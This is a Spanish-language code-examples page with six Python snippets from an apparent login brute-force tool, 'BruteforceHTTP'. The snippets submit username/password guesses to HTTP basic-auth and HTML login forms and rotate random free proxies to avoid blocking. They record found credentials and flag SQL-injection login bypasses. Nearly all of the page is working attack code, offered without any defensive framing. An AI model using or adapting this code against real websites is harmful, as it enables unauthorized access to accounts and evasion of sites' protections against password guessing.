Ejemplos de Browser en Python

Ejemplo n.º 1

Archivo: httpget.py Proyecto: nusaibsqli/BruteforceHTTP

def submit(options, login_field, creds, result):
    password, username = creds

    if username in [x[1] for x in list(result.queue)]:
        return True

    try:
        proc = Browser()
        if options.proxy:
            proxyAddr = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxyAddr)
        else:
            proxyAddr = ""

        resp = proc.open_url(options.url, auth=(username, password))

        if resp.status_code == 401:
            if options.verbose:
                events.fail("['%s':%s'] <==> %s" %
                            (username, password, proxyAddr),
                            title=proc.get_title())
        elif resp.status_code > 400:
            events.error(
                "[%s] ['%s': '%s']" % (proc.get_url(), username, password),
                "%s" % resp.status_code)
        else:
            events.found(username, password, proc.get_title())
            result.put([options.url, username, password])

    except Exception as error:
        events.error("%s" % (error), "BRUTE")
        return False

    finally:
        proc.close()

Ejemplo n.º 2

Archivo: reauth.py Proyecto: nusaibsqli/BruteforceHTTP

def submit(url, options, tryCreds, result):
    try:
        proc = Browser()

        events.info("Checking %s" % (url), "REAUTH")

        proc.open(url)
        loginInfo = find_login_form(proc.forms())

    except Exception as error:
        events.error("%s" % (error), "REAUTH")
        sys.exit(1)

    if not loginInfo:
        events.error("No login form at %s" % (url), "REAUTH")
        sys.exit(1)

    else:
        try:
            options.url = url

            loginbrute.submit(
                # Reverse username + password. Dynamic submit in loginbrute
                options,
                loginInfo,
                tryCreds[-2:][::-1],
                result)
        except Exception as error:
            events.error("%s" % (error), "REAUTH")
            sys.exit(1)

Ejemplo n.º 3

Archivo: getproxy.py Proyecto: nusaibsqli/BruteforceHTTP

	def checProxyConn(proxyAddr, target, result, verbose):
		try:
			proxyTest = Browser()
			proxyTest.set_random_proxy(proxyAddr)
			
			if verbose:
				events.info("Testing %s" % (proxyAddr))
			
			proxyTest.open_url(target)
			
			if verbose:
				events.success("Connected via %s" %(proxyAddr), "PROXY")
			result.put(proxyAddr)
			
		except KeyboardInterrupt:
			events.error("Terminated by user", "STOPPED")
			global set_break
			set_break = True
		
		except Exception as error:
			if verbose:
				events.error("[%s] [%s]" % (proxyAddr, error))
		finally:
			try:
				proxyTest.close()
			except:
				pass

Ejemplo n.º 4

def find_login_request(options):
    """
	Find and analysis login request from response
	:param options: object = options of user
	:return: False or list of string = login request information
	"""
    login_request = False
    try:
        from cores.browser import Browser

        proc = Browser()

        resp = proc.open_url(options.url)
        """
			Check URL type. If Website directs to other URL,
			options.url is website's panel
			else: it is login url.
			Example: options.url = site.com/wp-admin/ -> panel
				site directs user to wp-login -> login URL
				options.url = site.com/wp-login.php -> login URL
		"""
        if proc.get_url() != options.url:
            events.info("Website moves to: ['%s']" % (proc.get_url()))

        options.attack_mode = "--loginbrute"
        if options.run_options["--verbose"]:
            events.info("%s" % (proc.get_title()), "TITLE")
        if resp.status_code == 401:
            if "WWW-Authenticate" in resp.headers:
                login_id = basic_http_request(resp.headers)
                login_request = (login_id, ["Password", "User Name"])
                if options.verbose:
                    events.info("HTTP GET login")
                options.attack_mode = "--httpget"

        else:
            login_request = find_login_form(proc.forms())
            options.txt = resp.content

    except KeyboardInterrupt:
        pass

    except Exception as error:
        events.error("%s" % (error), "TARGET")
        sys.exit(1)

    finally:
        try:
            proc.close()
        except:
            pass
        return login_request

Ejemplo n.º 5

Archivo: getproxy.py Proyecto: nusaibsqli/BruteforceHTTP

	def checkProxyConnProvider(url = "https://free-proxy-list.net/"):
		try:
			events.info("Gathering proxies from %s" % (url))
			
			getproxy = Browser()
			
			getproxy.open_url(url)
			events.success("Gathering proxies completed", "PROXY")
			return getproxy.get_response()
		
		except Exception as error:
			events.error("%s" % (error), "PROXY")
			sys.exit(1)
		finally:
			getproxy.close()

Ejemplo n.º 6

def submit(options, login_field, tryCred, result):
    password, username = tryCred

    if username in [x[1] for x in list(result.queue)]:
        return True

    from cores.browser import Browser
    isLoginSuccess = "False"
    try:
        proc = Browser()
        if options.proxy:
            # Set proxy connect
            proxy_address = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxy_address)
        else:
            proxy_address = ""

        proc.open_url(options.url)
        _form = find_login_form(proc.forms())

        if not _form:
            options.block_text = proc.get_response(
            )  # TODO check if block text changes
            if options.verbose:
                isLoginSuccess = "blocked"
                events.error("Get blocked", "BRUTE")
            return False
        else:
            form_control, form_fields = _form

        if options.verbose and login_field != _form:
            events.info("Login form has been changed", "BRUTE")

        resp = proc.form_submit(form_control, form_fields, tryCred)

        from cores.analysis import get_response_diff
        text_changed, source_changed = get_response_diff(
            options.txt.decode('utf-8'), resp.content.decode('utf-8'))
        """
			If there is no other login form, check all changes in response
			If there is no login request from all new urls -> successfully
			== > Behavior: Login fail, click here or windows.location = login_page
		"""
        # "Login form is still there. Oops"

        if find_login_form(proc.forms()):
            isLoginForm = True
        else:
            isLoginForm = False

        if not isLoginForm:
            for new_url in get_redirection(source_changed):
                if not new_url.startswith("http") and not new_url.endswith(
                        options.exceptions()):
                    try:
                        from urllib.parse import urljoin
                    except ImportError:
                        from urlparse import urljoin
                    new_url = urljoin(options.url, new_url)

                if new_url and get_domain(options.url) == get_domain(new_url):
                    proc.open_url(new_url)
                    if find_login_form(proc.forms()):
                        isLoginForm = True
                        break
                    else:
                        isLoginForm = False

        if not isLoginForm:
            """
				Check SQL Injection
				1. SQL Injection
				2. Login successfully: No SQLi + No Login form
			"""
            if check_sqlerror(proc.get_response()):
                isLoginSuccess = "SQLi"
            elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
                pass
            else:
                if resp.status_code >= 400:
                    isLoginSuccess = "error"
                else:
                    isLoginSuccess = "True"
                # "If we tried login form with username+password field"
        else:
            pass

        return True

    except Exception as error:
        """
			Sometimes, web servers return error code because of bad configurations,
			but our cred is true.
			This code block showing information, for special cases
		"""
        isLoginSuccess = "exception"
        events.error("%s" % (error), "BRUTE")

    finally:
        if isLoginSuccess == "SQLi":
            events.success("SQL Injection bypass", "BRUTE")
            events.info("['%s': '%s']" % (username, password))
        elif isLoginSuccess == "error" and options.verbose:
            if username:
                events.error(
                    "['%s':'%s'] <--> %s" %
                    (username, password, proxy_address),
                    "%s" % (resp.status_code))
            else:
                events.error("[%s] <--> %s" % (password, proxy_address),
                             "%s" % (resp.status_code))
        elif isLoginSuccess == "True":
            if username:
                events.found(username, password, proc.get_title())
                result.put([options.url, username, password])
            else:
                events.found('', password, proc.get_title())
                result.put([options.url, username, password])
        elif isLoginSuccess == "False" and options.verbose:
            if username:
                events.fail(
                    "['%s':'%s'] <==> %s" %
                    (username, password, proxy_address), text_changed,
                    proc.get_title())
            else:
                events.fail("['%s'] <==> %s" % (password, proxy_address),
                            text_changed, proc.get_title())
        proc.close()